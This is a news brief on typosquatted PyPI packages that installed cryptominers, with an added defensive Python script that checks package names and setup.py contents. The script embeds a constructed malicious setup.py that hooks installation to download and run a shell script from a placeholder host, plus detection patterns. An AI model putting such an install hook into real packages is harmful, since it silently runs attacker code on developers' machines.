Multiple PyPI packages installing cryptominers were caught this week by security researcher Ax Sharma. Six different packages, most of them impersonating the popular “matplotlib” Python package used to create graphs and visualizations, used similar spellings or wording in an attempt to dupe unsuspecting victims into installing the malicious package instead. In a blog post, Sharma showed that the malicious setup.py files were downloading a Bash script from a GitHub repository during package installation. These scripts in turn downloaded a cryptominer known as “Ubqminer”, which mines the Ubiq cryptocurrency. Another version of the malicious package installer opted for the open-source T-Rex miner, which let the attacker use the victim’s GPU instead of the CPU when mining.
Typosquatting of popular package names in PyPI, npm and other large open-source package repositories is not uncommon. Double-check package names before installing them, and look into whether a package really is what it claims to be. While many projects will need some sort of dependency, developers should also think about which packages are really needed before installing them.
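The two checks recommended above, name verification and a look at what the package does at install time, can be partly automated. The following Python script is an added example and is not code from the article or from the researcher it cites: it flags requested package names that sit within a small edit distance of a known-good list (the list here is constructed; in practice it would be seeded from the packages your organisation already approves) and scans a setup.py source string for indicators that it does more than declare metadata, such as shelling out, fetching remote content or hooking the install command, which is the behaviour the article describes. The sample setup.py contents and the placeholder URL are constructed for illustration.

```python
"""Added example (not from the original article): pre-install checks for
typosquatted package names and for install-time download behaviour in setup.py."""
import re

# Constructed allow-list of well-known package names for the demonstration.
POPULAR_PACKAGES = {
    "matplotlib", "numpy", "requests", "pandas", "scipy", "flask", "django",
}


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute)."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost))
        prev = cur
    return prev[-1]


def normalize(name: str) -> str:
    """PEP 503 style normalisation: lower-case and collapse runs of -, _ and ."""
    return re.sub(r"[-_.]+", "-", name).lower()


def typosquat_candidates(name, known=POPULAR_PACKAGES, max_distance=2):
    """Return (known_name, distance) pairs the requested name is suspiciously
    close to. An exact match is not a squat; distance 1..max_distance is flagged."""
    n = normalize(name)
    hits = []
    for k in known:
        d = levenshtein(n, normalize(k))
        if 0 < d <= max_distance:
            hits.append((k, d))
    return sorted(hits, key=lambda t: t[1])


# Indicators that a setup.py does more than declare metadata at install time.
INSTALL_TIME_INDICATORS = [
    r"\bsubprocess\.",
    r"\bos\.system\(",
    r"\burllib\.request\b",
    r"\brequests\.get\(",
    r"\bcmdclass\s*=",          # custom install command hooked in
    r"https?://[^\s'\"]+",      # hard-coded remote URL
]


def scan_setup_py(source: str):
    """Return the indicator patterns that match in a setup.py source string."""
    return [p for p in INSTALL_TIME_INDICATORS if re.search(p, source)]


# Constructed sample: the shape of a setup.py that fetches and runs a script
# during installation (placeholder URL, not a real host).
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess, urllib.request

class PostInstall(install):
    def run(self):
        urllib.request.urlretrieve("https://example.invalid/helper.sh", "/tmp/helper.sh")
        subprocess.call(["sh", "/tmp/helper.sh"])
        install.run(self)

setup(name="matplotlb", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary metadata-only setup.py.
CLEAN_SETUP = '''
from setuptools import setup
setup(name="mytool", version="1.0.0", packages=["mytool"])
'''

if __name__ == "__main__":
    for pkg in ["matplotlib", "matplotlb", "mat-plotlib", "numpi", "mytool"]:
        print(f"{pkg:12} -> {typosquat_candidates(pkg)}")
    print("suspicious setup.py:", scan_setup_py(SUSPICIOUS_SETUP))
    print("clean setup.py:     ", scan_setup_py(CLEAN_SETUP))
```

A hit from either check is a reason to pause, not a verdict: legitimate packages sometimes ship a custom install command, and two unrelated packages can have similar names. The point is to surface anything that deserves a closer look before `pip install` runs its setup.py.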